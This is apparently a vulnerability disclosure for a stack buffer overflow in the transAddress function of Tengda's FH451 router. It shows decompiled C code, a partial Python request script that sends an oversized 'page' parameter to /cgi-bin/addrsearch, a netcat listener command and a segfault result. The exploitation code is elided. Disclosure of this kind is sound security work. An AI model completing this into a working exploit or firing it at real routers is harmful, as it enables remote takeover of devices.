### Critical Vulnerability Information

#### Vulnerability Description

- **Vendor**: Shenzhen Jixiang Tengda Technology Co., Ltd.
- **Product**: FH451
- **Vulnerability Type**: Remote Code Execution (RCE)

#### Vulnerability Analysis

- **Problematic Function**: `transAddress`
- **Problematic Code**:

```c
int _fastcall transAddress(int a1)
{
  int v2; // [sp+0h] [bp-38h]
  char *v3; // [sp+4h] [bp-34h]
  char s[52]; // [sp+8h] [bp-30h]
  const char *v6; // [sp+38h] [bp-0h]
  char *v7; // [sp+3Ch] [bp-4h]
  v6 = "page";
  v7 = "";
  if ( !strcmp(v6, "entry") && strcmp(a1, "") ) {
    strcpy(s, "index");
    strcat(s, ".php");
    return s;
  }
  sscanf(a1, "%s", &v7);
  strcat(s, v7);
  strcat(s, ".php");
  return s;
}
```

- **Root Cause**: The function uses the user-supplied `page` parameter directly, without any length validation. When the `page` parameter is excessively large, it causes a stack overflow at the `sscanf` call on line 15, potentially leading to remote code execution.

#### Exploitation Method

- **Exploitation Function**: `sub_6D6C`
- **Critical Code**:

```c
sub_6D6C:
...
```

#### Payload

- **Example Code**:

```python
import requests

url = 'http://0.0.0.0/cgi-bin/addrsearch'
data = {'page': payload}
res = requests.post(url, data=data)
```

#### Reproduction Steps

- **Command Line Operations**:

```bash
nc -lvp 80
python address.py
```

#### Result

- **Crash Message**:

```
Segmentation fault
```

This information indicates that the device is vulnerable to a severe remote code execution flaw. Attackers can trigger a stack overflow by crafting specific request parameters, thereby executing arbitrary code.
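The root cause above is an unbounded `sscanf("%s")` and `strcat` into a 52-byte stack buffer. As an added example (not vendor code and not from the original advisory), the following sketch shows a length-checked counterpart; the function name `trans_address_checked`, its signature and the caller-owned output buffer are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define ADDR_BUF_LEN 52        /* same size as s[52] in the decompiled function */
#define ADDR_SUFFIX  ".php"

/*
 * Hypothetical bounded counterpart to transAddress (name and signature are
 * assumptions, not vendor code). Builds "<page>.php" in a caller-owned buffer
 * and rejects input that does not fit, instead of copying it onto the stack
 * unchecked. Returns 0 on success, -1 when the input is rejected.
 */
int trans_address_checked(const char *page, char *out, size_t out_len)
{
    const size_t suffix_len = strlen(ADDR_SUFFIX);
    size_t page_len;

    if (page == NULL || out == NULL || out_len == 0)
        return -1;
    out[0] = '\0';

    /* Like "%s": skip leading whitespace, take one whitespace-delimited token. */
    page += strspn(page, " \t\n\v\f\r");
    page_len = strcspn(page, " \t\n\v\f\r");
    if (page_len == 0)
        return -1;

    /* Check before copying: token + suffix + NUL must fit in out. */
    if (page_len > out_len - 1 || suffix_len > out_len - 1 - page_len)
        return -1;

    memcpy(out, page, page_len);
    memcpy(out + page_len, ADDR_SUFFIX, suffix_len + 1);  /* includes the NUL */
    return 0;
}

int main(void)
{
    char out[ADDR_BUF_LEN];
    char oversized[600];       /* constructed sample: far longer than the buffer */

    memset(oversized, 'A', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';

    printf("index     -> %d (%s)\n", trans_address_checked("index", out, sizeof out), out);
    printf("oversized -> %d\n", trans_address_checked(oversized, out, sizeof out));
    return 0;
}
```

Writing into a caller-owned buffer also avoids returning a pointer to the local array `s`, which the decompiled function does.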